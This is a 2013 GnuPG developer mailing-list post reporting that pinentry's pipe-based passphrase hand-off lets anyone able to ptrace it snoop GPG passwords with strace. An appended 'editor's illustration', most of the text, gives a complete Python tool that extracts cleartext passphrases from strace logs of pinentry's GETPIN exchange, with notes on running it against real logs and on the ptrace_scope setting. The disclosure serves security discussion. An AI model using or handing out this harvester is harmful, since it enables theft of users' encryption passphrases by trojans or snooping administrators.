Pinentry makes it awfully easy to snoop all passwords entered by the user

Niklas Schnelle niklas.schnelle at gmail.com
Wed Aug 28 17:39:56 CEST 2013


Dear GnuPG Devs,

First, I do understand this is not really a security vulnerability, as it is
rooted in the very design of pinentry; still, it looks like a major problem
to me.

So as I understand it, pinentry is used to request a password from the user
and it then sends that password to the requesting process via a pipe. The
problem here is that this makes it a lot easier to snoop passwords than if
gnupg read them in a more direct way. To demonstrate this I've created a
script [1] that waits for a pinentry process to start and then uses strace to
get a trace of the syscall used to write the password to the pipe. This makes
snooping on users' gpg passwords extremely easy. One simply runs the script
and it outputs the clear text passwords of all pinentry-based password entries,
plus some strace output I was too lazy to remove. Of course an attacker needs
access to the user's account or root access, but in many settings this is
quite easy to achieve (e.g. a trojan or an admin snooping on its users).
Now, if gnupg read the password itself, it would at least be harder to grep
for it in its trace, and it might get even harder with more secure input
like what Wayland wants to provide in the future.
What do you girls/guys think?

Greetings Niklas Schnelle

[1] http://pastebin.com/79t1ATzx
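Added example (editor's illustration, not Niklas's script from [1], which is not reproduced on this page): pinentry talks to gpg-agent over Assuan on its stdin/stdout, and after the agent sends `GETPIN` the PIN comes back as a `D <pin>` data line, so all a snooper has to do is read that one `write()` out of an strace log. The trace below is constructed, not a real capture, and the PIN in it is made up; the parser undoes strace's C-style escaping and Assuan's percent-escaping so the exact passphrase is recovered. One caveat a practitioner will want: on kernels with Yama, `kernel.yama.ptrace_scope=1` (the default on several distributions) stops an unprivileged same-user process from attaching to an unrelated pinentry, so the no-root variant of this attack depends on that setting; root is unaffected.

```python
import re

# Constructed sample of `strace -f -e trace=read,write -p <pinentry pid>` output.
# Not a real capture; the PIN "hunter2%ä" is invented. Assuan escapes '%' as
# "%25" and strace prints the UTF-8 bytes of "ä" as octal escapes.
SAMPLE_TRACE = r"""[pid 12345] write(1, "OK Pleased to meet you\n", 23) = 23
[pid 12345] read(0, "SETDESC Please enter the passphrase\n", 1002) = 36
[pid 12345] write(1, "OK\n", 3) = 3
[pid 12345] read(0, "GETPIN\n", 1002) = 7
[pid 12345] write(1, "D hunter2%25\303\244\n", 15) = 15
[pid 12345] write(1, "OK\n", 3) = 3
[pid 12345] read(0, "BYE\n", 1002) = 4
"""

# Matches one read()/write() line as strace prints it; the "..." marks a string
# strace truncated at its -s limit.
_SYSCALL_RE = re.compile(
    r'(?:\[pid\s+\d+\]\s*)?(read|write)\((\d+),\s*"((?:[^"\\]|\\.)*)"(?:\.\.\.)?'
    r',\s*\d+\)\s*=\s*(-?\d+)'
)

_SIMPLE_ESCAPES = {'n': b'\n', 't': b'\t', 'r': b'\r', 'a': b'\a',
                   'b': b'\b', 'f': b'\f', 'v': b'\v'}


def unescape_strace(s: str) -> bytes:
    """Turn the body of an strace C-style quoted string back into raw bytes."""
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c != '\\':
            out += c.encode('utf-8')
            i += 1
            continue
        i += 1
        if i >= len(s):            # dangling backslash, keep it literally
            out += b'\\'
            break
        c = s[i]
        if c in '01234567':        # \ooo octal, up to three digits
            j = i
            while j < len(s) and j - i < 3 and s[j] in '01234567':
                j += 1
            out.append(int(s[i:j], 8) & 0xFF)
            i = j
        elif c == 'x':             # \xHH hex, up to two digits
            j = i + 1
            while j < len(s) and j - i - 1 < 2 and s[j] in '0123456789abcdefABCDEF':
                j += 1
            out.append(int(s[i + 1:j], 16))
            i = j
        else:                      # \n, \t, \", \\ and friends
            out += _SIMPLE_ESCAPES.get(c, c.encode('latin-1'))
            i += 1
    return bytes(out)


def assuan_unescape(data: bytes) -> bytes:
    """Undo Assuan percent-escaping (%25 -> '%', %0A -> newline, ...)."""
    return re.sub(rb'%([0-9A-Fa-f]{2})',
                  lambda m: bytes([int(m.group(1), 16)]), data)


def extract_pins(trace: str) -> list:
    """Return every PIN pinentry wrote in answer to a GETPIN in the trace."""
    pins = []
    awaiting_pin = False
    for m in _SYSCALL_RE.finditer(trace):
        call, _fd, payload, ret = m.groups()
        if int(ret) < 0:           # failed syscall, nothing was transferred
            continue
        data = unescape_strace(payload)
        if call == 'read':
            # The agent's command arrives on stdin; only GETPIN yields a PIN.
            awaiting_pin = data.strip().upper().startswith(b'GETPIN')
        elif call == 'write' and awaiting_pin:
            for line in data.split(b'\n'):
                if line.startswith(b'D '):
                    pins.append(assuan_unescape(line[2:]).decode('utf-8', 'replace'))
                elif line.startswith((b'OK', b'ERR')):
                    awaiting_pin = False
    return pins


if __name__ == '__main__':
    import sys
    trace = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TRACE
    for pin in extract_pins(trace):
        print(repr(pin))
```

Run with no argument it parses the constructed trace; given a file it parses a real `strace -f -e trace=read,write` log, which is the whole "attack" the post describes once ptrace on pinentry is allowed.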